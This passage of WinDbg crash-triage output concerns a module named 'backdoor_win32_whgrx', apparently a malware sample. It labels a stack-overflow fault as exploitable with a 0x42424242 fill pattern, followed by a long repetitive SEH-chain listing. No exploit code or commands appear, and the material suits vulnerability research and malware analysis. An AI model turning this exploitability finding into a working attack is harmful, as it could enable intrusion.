backdoor_win32_whgrx+0x4042 \n043bff88 76e38654 kernel32!BaseThreadInitThunk+0x24 \n043bff9c 773c4a77 ntdll!__RtlUserThreadStart+0x2f \n043bffe4 773c4a47 ntdll!_RtlUserThreadStart+0x1b \n \n \nSTACK_COMMAND: .cxr 00000000043BD904 ; kb ; dds 43bdd64 ; kb \n \nSYMBOL_NAME: kernel32!BaseThreadInitThunk+0 \n \nFOLLOWUP_NAME: MachineOwner \n \nMODULE_NAME: kernel32 \n \nIMAGE_NAME: kernel32.dll \n \nDEBUG_FLR_IMAGE_TIMESTAMP: 744765ce \n \nFAILURE_BUCKET_ID: STACK_OVERFLOW_EXPLOITABLE_FILL_PATTERN_42424242_c0000005_kernel32.dll!BaseThreadInitThunk \n \nBUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_BAD_INSTRUCTION_PTR_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_42424242_BAD_IP_kernel32!BaseThreadInitThunk+0 \n \n \n0:002> !exchain \n042c1754: ntdll!ExecuteHandler2+44 (773e9d70) \n042c1d04: ntdll!ExecuteHandler2+44 (773e9d70) \n042c22b4: ntdll!ExecuteHandler2+44 (773e9d70) \n042c2864: ntdll!ExecuteHandler2+44 (773e9d70) \n042c2e14: ntdll!ExecuteHandler2+44 (773e9d70) \n042c33c4: ntdll!ExecuteHandler2+44 (773e9d70) \n042c3974: ntdll!ExecuteHandler2+44 (773e9d70) \n042c3f24: ntdll!ExecuteHandler2+44 (773e9d70) \n042c44d4: ntdll!ExecuteHandler2+44 (773e9d70) \n042c4a84: ntdll!ExecuteHandler2+44 (773e9d70) \n042c5034: ntdll!ExecuteHandler2+44 (773e9d70) \n042c55e4: ntdll!ExecuteHandler2+44 (773e9d70) \n042c5b94: ntdll!ExecuteHandler2+44 (773e9d70) \n042c6144: ntdll!ExecuteHandler2+44 (773e9d70) \n042c66f4: ntdll!ExecuteHandler2+44 (773e9d70) \n042c6ca4: ntdll!ExecuteHandler2+44 (773e9d70) \n042c7254: ntdll!ExecuteHandler2+44 (773e9d70) \n042c7804: ntdll!ExecuteHandler2+44 (773e9d70) \n042c7db4: ntdll!ExecuteHandler2+44 (773e9d70) \n042c8364: ntdll!ExecuteHandler2+44 (773e9d70) \n042c8914: ntdll!ExecuteHandler2+44 (773e9d70) \n042c8ec4: ntdll!ExecuteHandler2+44 (773e9d70) \n042c9474: ntdll!ExecuteHandler2+44 (773e9d70) \n042c9a24: ntdll!ExecuteHandler2+44 (773e9d70) \n042c9fd4: ntdll!ExecuteHandler2+44 (773e9d70) \n042ca584: ntdll!ExecuteHandler2+44 (773e9d70) \n042cab34: ntdll!ExecuteHandler2+44 (773e9d70) \n042cb0e4: ntdll!ExecuteHandler2+44 (773e9d70) \n042cb694: ntdll!ExecuteHandler2+44 (773e9d70) \n042cbc44: ntdll!ExecuteHandler2+44 (773e9d70) \n042cc1f4: ntdll!ExecuteHandler2+44 (773e9d70) \n042cc7a4: ntdll!ExecuteHandler2+44 (773e9d70) \n042ccd54: ntdll!ExecuteHandler2+44 (773e9d70) \n042cd304: ntdll!ExecuteHandler2+44 (773e9d70) \n042cd8b4: ntdll!ExecuteHandler2+44 (773e9d70) \n042cde64: ntdll!ExecuteHandler2+44 (773e9d70) \n042ce414: ntdll!ExecuteHandler2+44 (773e9d70) \n042ce9c4: ntdll!ExecuteHandler2+44 (773e9d70) \n042cef74: ntdll!ExecuteHandler2+44 (773e9d70) \n042cf524: ntdll!ExecuteHandler2+44 (773e9d70) \n042cfad4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d0084: ntdll!ExecuteHandler2+44 (773e9d70) \n042d0634: ntdll!ExecuteHandler2+44 (773e9d70) \n042d0be4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d1194: ntdll!ExecuteHandler2+44 (773e9d70) \n042d1744: ntdll!ExecuteHandler2+44 (773e9d70) \n042d1cf4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d22a4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d2854: ntdll!ExecuteHandler2+44 (773e9d70) \n042d2e04: ntdll!ExecuteHandler2+44 (773e9d70) \n042d33b4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d3964: ntdll!ExecuteHandler2+44 (773e9d70) \n042d3f14: ntdll!ExecuteHandler2+44 (773e9d70) \n042d44c4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d4a74: ntdll!ExecuteHandler2+44 (773e9d70) \n042d5024: ntdll!ExecuteHandler2+44 (773e9d70) \n042d55d4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d5b84: ntdll!ExecuteHandler2+44 (773e9d70) \n042d6134: ntdll!ExecuteHandler2+44 (773e9d70) \n042d66e4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d6c94: ntdll!ExecuteHandler2+44 (773e9d70) \n042d7244: ntdll!ExecuteHandler2+44 (773e9d70) \n042d77f4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d7da4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d8354: ntdll!ExecuteHandler2+44 (773e9d70) \n042d8904: ntdll!ExecuteHandler2+44 (773e9d70) \n042d8eb4: ntdll!ExecuteHandler2+44 (773e9d70) \n042d9464: ntdll!ExecuteHandler2+44 (773e9d70) \n042d9a14: ntdll!ExecuteHandler2+44 (773e9d70) \n042d9fc4: ntdll!ExecuteHandler2+44 (773e9d70) \n042da574: ntdll!ExecuteHandler2+44 (773e9d70) \n042dab24: ntdll!ExecuteHandler2+44 (773e9d70) \n042db0d4: ntdll!ExecuteHandler2+44 (773e9d70) \n042db684: ntdll!ExecuteHandler2+44 (773e9d70) \n042dbc34: ntdll!ExecuteHandler2+44 (773e9d70) \n042dc1e4: ntdll!ExecuteHandler2+44 (773e9d70) \n042dc794: ntdll!ExecuteHandler2+44 (773e9d70) \n042dcd44: ntdll!ExecuteHandler2+44 (773e9d70) \n042dd2f4: ntdll!ExecuteHandler2+44 (773e9d70) \n042dd8a4: ntdll!ExecuteHandler2+44 (773e9d70) \n042dde54: ntdll!ExecuteHandler2+44 (773e9d70) \n042de404: ntdll!ExecuteHandler2+44 (773e9d70) \n042de9b4: ntdll!ExecuteHandler2+44 (773e9d70) \n042def64: ntdll!ExecuteHandler2+44 (773e9d70) \n042df514: ntdll!ExecuteHandler2+44 (773e9d70) \n042dfac4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e0074: ntdll!ExecuteHandler2+44 (773e9d70) \n042e0624: ntdll!ExecuteHandler2+44 (773e9d70) \n042e0bd4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e1184: ntdll!ExecuteHandler2+44 (773e9d70) \n042e1734: ntdll!ExecuteHandler2+44 (773e9d70) \n042e1ce4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e2294: ntdll!ExecuteHandler2+44 (773e9d70) \n042e2844: ntdll!ExecuteHandler2+44 (773e9d70) \n042e2df4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e33a4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e3954: ntdll!ExecuteHandler2+44 (773e9d70) \n042e3f04: ntdll!ExecuteHandler2+44 (773e9d70) \n042e44b4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e4a64: ntdll!ExecuteHandler2+44 (773e9d70) \n042e5014: ntdll!ExecuteHandler2+44 (773e9d70) \n042e55c4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e5b74: ntdll!ExecuteHandler2+44 (773e9d70) \n042e6124: ntdll!ExecuteHandler2+44 (773e9d70) \n042e66d4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e6c84: ntdll!ExecuteHandler2+44 (773e9d70) \n042e7234: ntdll!ExecuteHandler2+44 (773e9d70) \n042e77e4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e7d94: ntdll!ExecuteHandler2+44 (773e9d70) \n042e8344: ntdll!ExecuteHandler2+44 (773e9d70) \n042e88f4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e8ea4: ntdll!ExecuteHandler2+44 (773e9d70) \n042e9454: ntdll!ExecuteHandler2+44 (773e9d70) \n042e9a04: ntdll!ExecuteHandler2+44 (773e9d70) \n042e9fb4: ntdll!ExecuteHandler2+44 (773e9d70) \n042ea564: ntdll!ExecuteHandler2+44 (773e9d70) \n042eab14: ntdll!ExecuteHandler2+44 (773e9d70) \n042eb0c4: ntdll!ExecuteHandler2+44 (773e9d70) \n042eb674: ntdll!ExecuteHandler2+44 (773e9d70) \n042ebc24: ntdll!ExecuteHandler2+44 (773e9d70) \n042ec1d4: ntdll!ExecuteHandler2+44 (773e9d70) \n042ec784: ntdll!ExecuteHandler2+44 (773e9d70) \n042ecd34: ntdll!ExecuteHandler2+44 (773e9d70) \n042ed2e4: ntdll!ExecuteHandler2+44 (773e9d70) \n042ed894: ntdll!ExecuteHandler2+44 (773e9d70) \n042ede44: ntdll!ExecuteHandler2+44 (773e9d70) \n042ee3f4: ntdll!ExecuteHandler2+44 (773e9d70) \n042ee9a4: ntdll!ExecuteHandler2+44 (773e9d70) \n042eef54: ntdll!ExecuteHandler2+44 (773e9d70) \n042ef504: ntdll!ExecuteHandler2+44 (773e9d70) \n042efab4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f0064: ntdll!ExecuteHandler2+44 (773e9d70) \n042f0614: ntdll!ExecuteHandler2+44 (773e9d70) \n042f0bc4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f1174: ntdll!ExecuteHandler2+44 (773e9d70) \n042f1724: ntdll!ExecuteHandler2+44 (773e9d70) \n042f1cd4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f2284: ntdll!ExecuteHandler2+44 (773e9d70) \n042f2834: ntdll!ExecuteHandler2+44 (773e9d70) \n042f2de4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f3394: ntdll!ExecuteHandler2+44 (773e9d70) \n042f3944: ntdll!ExecuteHandler2+44 (773e9d70) \n042f3ef4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f44a4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f4a54: ntdll!ExecuteHandler2+44 (773e9d70) \n042f5004: ntdll!ExecuteHandler2+44 (773e9d70) \n042f55b4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f5b64: ntdll!ExecuteHandler2+44 (773e9d70) \n042f6114: ntdll!ExecuteHandler2+44 (773e9d70) \n042f66c4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f6c74: ntdll!ExecuteHandler2+44 (773e9d70) \n042f7224: ntdll!ExecuteHandler2+44 (773e9d70) \n042f77d4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f7d84: ntdll!ExecuteHandler2+44 (773e9d70) \n042f8334: ntdll!ExecuteHandler2+44 (773e9d70) \n042f88e4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f8e94: ntdll!ExecuteHandler2+44 (773e9d70) \n042f9444: ntdll!ExecuteHandler2+44 (773e9d70) \n042f99f4: ntdll!ExecuteHandler2+44 (773e9d70) \n042f9fa4: ntdll!ExecuteHandler2+44 (773e9d70) \n042fa554: ntdll!ExecuteHandler2+44 (773e9d70) \n042fab04: ntdll!ExecuteHandler2+44 (773e9d70) \n042fb0b4: ntdll!ExecuteHandler2+44 (773e9d70) \n042fb664: ntdll!ExecuteHandler2+44 (773e9d70) \n042fbc14: ntdll!ExecuteHandler2+44 (773e9d70) \n042fc1c4: ntdll!ExecuteHandler2+44 (773e9d70) \n042fc774: ntdll!ExecuteHandler2+44 (773e9d70) \n042fcd24: ntdll!ExecuteHandler2+44 (773e9d70) \n042fd2d4: ntdll!ExecuteHandler2+44 (773e9d70) \n042fd884: ntdll!ExecuteHandler2+44 (773e9d70) \n042fde34: ntdll!ExecuteHandler2+44 (773e9d70) \n042fe3e4: ntdll!ExecuteHandler2+44 (773e9d70) \n042fe994: ntdll!ExecuteHandler2+44 (773e9d70) \n042fef44: ntdll!ExecuteHandler2+44 (773e9d70) \n042ff4f4: ntdll!ExecuteHandler2+44 (773e9d70) \n042ffaa4: ntdll!ExecuteHandler2+44 (773e9d70) \n04300054: ntdll!ExecuteHandler2+44 (773e9d70) \n04300604: ntdll!ExecuteHandler2+44 (773e9d70) \n04300bb4: ntdll!ExecuteHandler2+44 (773e9d70) \n04301164: ntdll!ExecuteHandler2+44 (773e9d70) \n04301714: ntdll!ExecuteHandler2+44 (773e9d70) \n04301cc4: ntdll!ExecuteHandler2+44 (773e9d70) \n04302274: ntdll!ExecuteHandler2+44 (773e9d70) \n04302824: ntdll!ExecuteHandler2+44 (773e9d70) \n04302dd4: ntdll!ExecuteHandler2+44 (773e9d70) \n04303384: ntdll!ExecuteHandler2+44 (773e9d70) \n04303934: ntdll!ExecuteHandler2+44 (773e9d70) \n04303ee4: ntdll!ExecuteHandler2+44 (773e9d70) \n04304494: ntdll!ExecuteHandler2+44 (773e9d70) \n04304a44: ntdll!ExecuteHandler2+44 (773e9d70) \n04304ff4: ntdll!ExecuteHandler2+44 (773e9d70) \n043055a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04305b54: ntdll!ExecuteHandler2+44 (773e9d70) \n04306104: ntdll!ExecuteHandler2+44 (773e9d70) \n043066b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04306c64: ntdll!ExecuteHandler2+44 (773e9d70) \n04307214: ntdll!ExecuteHandler2+44 (773e9d70) \n043077c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04307d74: ntdll!ExecuteHandler2+44 (773e9d70) \n04308324: ntdll!ExecuteHandler2+44 (773e9d70) \n043088d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04308e84: ntdll!ExecuteHandler2+44 (773e9d70) \n04309434: ntdll!ExecuteHandler2+44 (773e9d70) \n043099e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04309f94: ntdll!ExecuteHandler2+44 (773e9d70) \n0430a544: ntdll!ExecuteHandler2+44 (773e9d70) \n0430aaf4: ntdll!ExecuteHandler2+44 (773e9d70) \n0430b0a4: ntdll!ExecuteHandler2+44 (773e9d70) \n0430b654: ntdll!ExecuteHandler2+44 (773e9d70) \n0430bc04: ntdll!ExecuteHandler2+44 (773e9d70) \n0430c1b4: ntdll!ExecuteHandler2+44 (773e9d70) \n0430c764: ntdll!ExecuteHandler2+44 (773e9d70) \n0430cd14: ntdll!ExecuteHandler2+44 (773e9d70) \n0430d2c4: ntdll!ExecuteHandler2+44 (773e9d70) \n0430d874: ntdll!ExecuteHandler2+44 (773e9d70) \n0430de24: ntdll!ExecuteHandler2+44 (773e9d70) \n0430e3d4: ntdll!ExecuteHandler2+44 (773e9d70) \n0430e984: ntdll!ExecuteHandler2+44 (773e9d70) \n0430ef34: ntdll!ExecuteHandler2+44 (773e9d70) \n0430f4e4: ntdll!ExecuteHandler2+44 (773e9d70) \n0430fa94: ntdll!ExecuteHandler2+44 (773e9d70) \n04310044: ntdll!ExecuteHandler2+44 (773e9d70) \n043105f4: ntdll!ExecuteHandler2+44 (773e9d70) \n04310ba4: ntdll!ExecuteHandler2+44 (773e9d70) \n04311154: ntdll!ExecuteHandler2+44 (773e9d70) \n04311704: ntdll!ExecuteHandler2+44 (773e9d70) \n04311cb4: ntdll!ExecuteHandler2+44 (773e9d70) \n04312264: ntdll!ExecuteHandler2+44 (773e9d70) \n04312814: ntdll!ExecuteHandler2+44 (773e9d70) \n04312dc4: ntdll!ExecuteHandler2+44 (773e9d70) \n04313374: ntdll!ExecuteHandler2+44 (773e9d70) \n04313924: ntdll!ExecuteHandler2+44 (773e9d70) \n04313ed4: ntdll!ExecuteHandler2+44 (773e9d70) \n04314484: ntdll!ExecuteHandler2+44 (773e9d70) \n04314a34: ntdll!ExecuteHandler2+44 (773e9d70) \n04314fe4: ntdll!ExecuteHandler2+44 (773e9d70) \n04315594: ntdll!ExecuteHandler2+44 (773e9d70) \n04315b44: ntdll!ExecuteHandler2+44 (773e9d70) \n043160f4: ntdll!ExecuteHandler2+44 (773e9d70) \n043166a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04316c54: ntdll!ExecuteHandler2+44 (773e9d70) \n04317204: ntdll!ExecuteHandler2+44 (773e9d70) \n043177b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04317d64: ntdll!ExecuteHandler2+44 (773e9d70) \n04318314: ntdll!ExecuteHandler2+44 (773e9d70) \n043188c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04318e74: ntdll!ExecuteHandler2+44 (773e9d70) \n04319424: ntdll!ExecuteHandler2+44 (773e9d70) \n043199d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04319f84: ntdll!ExecuteHandler2+44 (773e9d70) \n0431a534: ntdll!ExecuteHandler2+44 (773e9d70) \n0431aae4: ntdll!ExecuteHandler2+44 (773e9d70) \n0431b094: ntdll!ExecuteHandler2+44 (773e9d70) \n0431b644: ntdll!ExecuteHandler2+44 (773e9d70) \n0431bbf4: ntdll!ExecuteHandler2+44 (773e9d70) \n0431c1a4: ntdll!ExecuteHandler2+44 (773e9d70) \n0431c754: ntdll!ExecuteHandler2+44 (773e9d70) \n0431cd04: ntdll!ExecuteHandler2+44 (773e9d70) \n0431d2b4: ntdll!ExecuteHandler2+44 (773e9d70) \n0431d864: ntdll!ExecuteHandler2+44 (773e9d70) \n0431de14: ntdll!ExecuteHandler2+44 (773e9d70) \n0431e3c4: ntdll!ExecuteHandler2+44 (773e9d70) \n0431e974: ntdll!ExecuteHandler2+44 (773e9d70) \n0431ef24: ntdll!ExecuteHandler2+44 (773e9d70) \n0431f4d4: ntdll!ExecuteHandler2+44 (773e9d70) \n0431fa84: ntdll!ExecuteHandler2+44 (773e9d70) \n04320034: ntdll!ExecuteHandler2+44 (773e9d70) \n043205e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04320b94: ntdll!ExecuteHandler2+44 (773e9d70) \n04321144: ntdll!ExecuteHandler2+44 (773e9d70) \n043216f4: ntdll!ExecuteHandler2+44 (773e9d70) \n04321ca4: ntdll!ExecuteHandler2+44 (773e9d70) \n04322254: ntdll!ExecuteHandler2+44 (773e9d70) \n04322804: ntdll!ExecuteHandler2+44 (773e9d70) \n04322db4: ntdll!ExecuteHandler2+44 (773e9d70) \n04323364: ntdll!ExecuteHandler2+44 (773e9d70) \n04323914: ntdll!ExecuteHandler2+44 (773e9d70) \n04323ec4: ntdll!ExecuteHandler2+44 (773e9d70) \n04324474: ntdll!ExecuteHandler2+44 (773e9d70) \n04324a24: ntdll!ExecuteHandler2+44 (773e9d70) \n04324fd4: ntdll!ExecuteHandler2+44 (773e9d70) \n04325584: ntdll!ExecuteHandler2+44 (773e9d70) \n04325b34: ntdll!ExecuteHandler2+44 (773e9d70) \n043260e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04326694: ntdll!ExecuteHandler2+44 (773e9d70) \n04326c44: ntdll!ExecuteHandler2+44 (773e9d70) \n043271f4: ntdll!ExecuteHandler2+44 (773e9d70) \n043277a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04327d54: ntdll!ExecuteHandler2+44 (773e9d70) \n04328304: ntdll!ExecuteHandler2+44 (773e9d70) \n043288b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04328e64: ntdll!ExecuteHandler2+44 (773e9d70) \n04329414: ntdll!ExecuteHandler2+44 (773e9d70) \n043299c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04329f74: ntdll!ExecuteHandler2+44 (773e9d70) \n0432a524: ntdll!ExecuteHandler2+44 (773e9d70) \n0432aad4: ntdll!ExecuteHandler2+44 (773e9d70) \n0432b084: ntdll!ExecuteHandler2+44 (773e9d70) \n0432b634: ntdll!ExecuteHandler2+44 (773e9d70) \n0432bbe4: ntdll!ExecuteHandler2+44 (773e9d70) \n0432c194: ntdll!ExecuteHandler2+44 (773e9d70) \n0432c744: ntdll!ExecuteHandler2+44 (773e9d70) \n0432ccf4: ntdll!ExecuteHandler2+44 (773e9d70) \n0432d2a4: ntdll!ExecuteHandler2+44 (773e9d70) \n0432d854: ntdll!ExecuteHandler2+44 (773e9d70) \n0432de04: ntdll!ExecuteHandler2+44 (773e9d70) \n0432e3b4: ntdll!ExecuteHandler2+44 (773e9d70) \n0432e964: ntdll!ExecuteHandler2+44 (773e9d70) \n0432ef14: ntdll!ExecuteHandler2+44 (773e9d70) \n0432f4c4: ntdll!ExecuteHandler2+44 (773e9d70) \n0432fa74: ntdll!ExecuteHandler2+44 (773e9d70) \n04330024: ntdll!ExecuteHandler2+44 (773e9d70) \n043305d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04330b84: ntdll!ExecuteHandler2+44 (773e9d70) \n04331134: ntdll!ExecuteHandler2+44 (773e9d70) \n043316e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04331c94: ntdll!ExecuteHandler2+44 (773e9d70) \n04332244: ntdll!ExecuteHandler2+44 (773e9d70) \n043327f4: ntdll!ExecuteHandler2+44 (773e9d70) \n04332da4: ntdll!ExecuteHandler2+44 (773e9d70) \n04333354: ntdll!ExecuteHandler2+44 (773e9d70) \n04333904: ntdll!ExecuteHandler2+44 (773e9d70) \n04333eb4: ntdll!ExecuteHandler2+44 (773e9d70) \n04334464: ntdll!ExecuteHandler2+44 (773e9d70) \n04334a14: ntdll!ExecuteHandler2+44 (773e9d70) \n04334fc4: ntdll!ExecuteHandler2+44 (773e9d70) \n04335574: ntdll!ExecuteHandler2+44 (773e9d70) \n04335b24: ntdll!ExecuteHandler2+44 (773e9d70) \n043360d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04336684: ntdll!ExecuteHandler2+44 (773e9d70) \n04336c34: ntdll!ExecuteHandler2+44 (773e9d70) \n043371e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04337794: ntdll!ExecuteHandler2+44 (773e9d70) \n04337d44: ntdll!ExecuteHandler2+44 (773e9d70) \n043382f4: ntdll!ExecuteHandler2+44 (773e9d70) \n043388a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04338e54: ntdll!ExecuteHandler2+44 (773e9d70) \n04339404: ntdll!ExecuteHandler2+44 (773e9d70) \n043399b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04339f64: ntdll!ExecuteHandler2+44 (773e9d70) \n0433a514: ntdll!ExecuteHandler2+44 (773e9d70) \n0433aac4: ntdll!ExecuteHandler2+44 (773e9d70) \n0433b074: ntdll!ExecuteHandler2+44 (773e9d70) \n0433b624: ntdll!ExecuteHandler2+44 (773e9d70) \n0433bbd4: ntdll!ExecuteHandler2+44 (773e9d70) \n0433c184: ntdll!ExecuteHandler2+44 (773e9d70) \n0433c734: ntdll!ExecuteHandler2+44 (773e9d70) \n0433cce4: ntdll!ExecuteHandler2+44 (773e9d70) \n0433d294: ntdll!ExecuteHandler2+44 (773e9d70) \n0433d844: ntdll!ExecuteHandler2+44 (773e9d70) \n0433ddf4: ntdll!ExecuteHandler2+44 (773e9d70) \n0433e3a4: ntdll!ExecuteHandler2+44 (773e9d70) \n0433e954: ntdll!ExecuteHandler2+44 (773e9d70) \n0433ef04: ntdll!ExecuteHandler2+44 (773e9d70) \n0433f4b4: ntdll!ExecuteHandler2+44 (773e9d70) \n0433fa64: ntdll!ExecuteHandler2+44 (773e9d70) \n04340014: ntdll!ExecuteHandler2+44 (773e9d70) \n043405c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04340b74: ntdll!ExecuteHandler2+44 (773e9d70) \n04341124: ntdll!ExecuteHandler2+44 (773e9d70) \n043416d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04341c84: ntdll!ExecuteHandler2+44 (773e9d70) \n04342234: ntdll!ExecuteHandler2+44 (773e9d70) \n043427e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04342d94: ntdll!ExecuteHandler2+44 (773e9d70) \n04343344: ntdll!ExecuteHandler2+44 (773e9d70) \n043438f4: ntdll!ExecuteHandler2+44 (773e9d70) \n04343ea4: ntdll!ExecuteHandler2+44 (773e9d70) \n04344454: ntdll!ExecuteHandler2+44 (773e9d70) \n04344a04: ntdll!ExecuteHandler2+44 (773e9d70) \n04344fb4: ntdll!ExecuteHandler2+44 (773e9d70) \n04345564: ntdll!ExecuteHandler2+44 (773e9d70) \n04345b14: ntdll!ExecuteHandler2+44 (773e9d70) \n043460c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04346674: ntdll!ExecuteHandler2+44 (773e9d70) \n04346c24: ntdll!ExecuteHandler2+44 (773e9d70) \n043471d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04347784: ntdll!ExecuteHandler2+44 (773e9d70) \n04347d34: ntdll!ExecuteHandler2+44 (773e9d70) \n043482e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04348894: ntdll!ExecuteHandler2+44 (773e9d70) \n04348e44: ntdll!ExecuteHandler2+44 (773e9d70) \n043493f4: ntdll!ExecuteHandler2+44 (773e9d70) \n043499a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04349f54: ntdll!ExecuteHandler2+44 (773e9d70) \n0434a504: ntdll!ExecuteHandler2+44 (773e9d70) \n0434aab4: ntdll!ExecuteHandler2+44 (773e9d70) \n0434b064: ntdll!ExecuteHandler2+44 (773e9d70) \n0434b614: ntdll!ExecuteHandler2+44 (773e9d70) \n0434bbc4: ntdll!ExecuteHandler2+44 (773e9d70) \n0434c174: ntdll!ExecuteHandler2+44 (773e9d70) \n0434c724: ntdll!ExecuteHandler2+44 (773e9d70) \n0434ccd4: ntdll!ExecuteHandler2+44 (773e9d70) \n0434d284: ntdll!ExecuteHandler2+44 (773e9d70) \n0434d834: ntdll!ExecuteHandler2+44 (773e9d70) \n0434dde4: ntdll!ExecuteHandler2+44 (773e9d70) \n0434e394: ntdll!ExecuteHandler2+44 (773e9d70) \n0434e944: ntdll!ExecuteHandler2+44 (773e9d70) \n0434eef4: ntdll!ExecuteHandler2+44 (773e9d70) \n0434f4a4: ntdll!ExecuteHandler2+44 (773e9d70) \n0434fa54: ntdll!ExecuteHandler2+44 (773e9d70) \n04350004: ntdll!ExecuteHandler2+44 (773e9d70) \n043505b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04350b64: ntdll!ExecuteHandler2+44 (773e9d70) \n04351114: ntdll!ExecuteHandler2+44 (773e9d70) \n043516c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04351c74: ntdll!ExecuteHandler2+44 (773e9d70) \n04352224: ntdll!ExecuteHandler2+44 (773e9d70) \n043527d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04352d84: ntdll!ExecuteHandler2+44 (773e9d70) \n04353334: ntdll!ExecuteHandler2+44 (773e9d70) \n043538e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04353e94: ntdll!ExecuteHandler2+44 (773e9d70) \n04354444: ntdll!ExecuteHandler2+44 (773e9d70) \n043549f4: ntdll!ExecuteHandler2+44 (773e9d70) \n04354fa4: ntdll!ExecuteHandler2+44 (773e9d70) \n04355554: ntdll!ExecuteHandler2+44 (773e9d70) \n04355b04: ntdll!ExecuteHandler2+44 (773e9d70) \n043560b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04356664: ntdll!ExecuteHandler2+44 (773e9d70) \n04356c14: ntdll!ExecuteHandler2+44 (773e9d70) \n043571c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04357774: ntdll!ExecuteHandler2+44 (773e9d70) \n04357d24: ntdll!ExecuteHandler2+44 (773e9d70) \n043582d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04358884: ntdll!ExecuteHandler2+44 (773e9d70) \n04358e34: ntdll!ExecuteHandler2+44 (773e9d70) \n043593e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04359994: ntdll!ExecuteHandler2+44 (773e9d70) \n04359f44: ntdll!ExecuteHandler2+44 (773e9d70) \n0435a4f4: ntdll!ExecuteHandler2+44 (773e9d70) \n0435aaa4: ntdll!ExecuteHandler2+44 (773e9d70) \n0435b054: ntdll!ExecuteHandler2+44 (773e9d70) \n0435b604: ntdll!ExecuteHandler2+44 (773e9d70) \n0435bbb4: ntdll!ExecuteHandler2+44 (773e9d70) \n0435c164: ntdll!ExecuteHandler2+44 (773e9d70) \n0435c714: ntdll!ExecuteHandler2+44 (773e9d70) \n0435ccc4: ntdll!ExecuteHandler2+44 (773e9d70) \n0435d274: ntdll!ExecuteHandler2+44 (773e9d70) \n0435d824: ntdll!ExecuteHandler2+44 (773e9d70) \n0435ddd4: ntdll!ExecuteHandler2+44 (773e9d70) \n0435e384: ntdll!ExecuteHandler2+44 (773e9d70) \n0435e934: ntdll!ExecuteHandler2+44 (773e9d70) \n0435eee4: ntdll!ExecuteHandler2+44 (773e9d70) \n0435f494: ntdll!ExecuteHandler2+44 (773e9d70) \n0435fa44: ntdll!ExecuteHandler2+44 (773e9d70) \n0435fff4: ntdll!ExecuteHandler2+44 (773e9d70) \n043605a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04360b54: ntdll!ExecuteHandler2+44 (773e9d70) \n04361104: ntdll!ExecuteHandler2+44 (773e9d70) \n043616b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04361c64: ntdll!ExecuteHandler2+44 (773e9d70) \n04362214: ntdll!ExecuteHandler2+44 (773e9d70) \n043627c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04362d74: ntdll!ExecuteHandler2+44 (773e9d70) \n04363324: ntdll!ExecuteHandler2+44 (773e9d70) \n043638d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04363e84: ntdll!ExecuteHandler2+44 (773e9d70) \n04364434: ntdll!ExecuteHandler2+44 (773e9d70) \n043649e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04364f94: ntdll!ExecuteHandler2+44 (773e9d70) \n04365544: ntdll!ExecuteHandler2+44 (773e9d70) \n04365af4: 